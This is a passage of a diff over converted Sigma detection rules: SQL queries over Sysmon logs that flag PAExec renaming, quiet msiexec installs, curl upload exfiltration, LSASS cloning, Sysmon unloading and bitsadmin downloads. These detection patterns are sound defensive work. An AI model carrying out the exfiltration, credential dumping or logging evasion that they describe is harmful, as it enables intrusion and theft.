"falsepositives": [ - "Legitimate use of the library for administrative activity" + "Legitimate use by administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": 
"Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.t1202" ], "falsepositives": [ - "Administrative script libraries" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": "b2309017-4235-44fe-b5af-b15363011957", + 
"title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "WindowsApps installing updates via the quiet flag" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": 
"Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", + "title": "Potential Encoded PowerShell Patterns In CommandLine", + "id": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific combinations of encoding methods in PowerShell via the commandline", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (((CommandLine LIKE '%ToInt%' ESCAPE '\\' OR CommandLine LIKE '%ToDecimal%' ESCAPE '\\' OR CommandLine LIKE '%ToByte%' ESCAPE '\\' OR CommandLine LIKE '%ToUint%' ESCAPE '\\' OR CommandLine LIKE '%ToSingle%' ESCAPE '\\' OR CommandLine LIKE '%ToSByte%' ESCAPE '\\') AND 
(CommandLine LIKE '%ToChar%' ESCAPE '\\' OR CommandLine LIKE '%ToString%' ESCAPE '\\' OR CommandLine LIKE '%String%' ESCAPE '\\')) OR ((CommandLine LIKE '%char%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\') OR (CommandLine LIKE '%split%' ESCAPE '\\' AND CommandLine LIKE '%join%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_encoding_patterns.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "status": 
"experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { 
- "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": "47e4bab7-c626-47dc-967b-255608c9a920", - "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": 
"00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "File With Suspicious Extension Downloaded Via 
Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' 
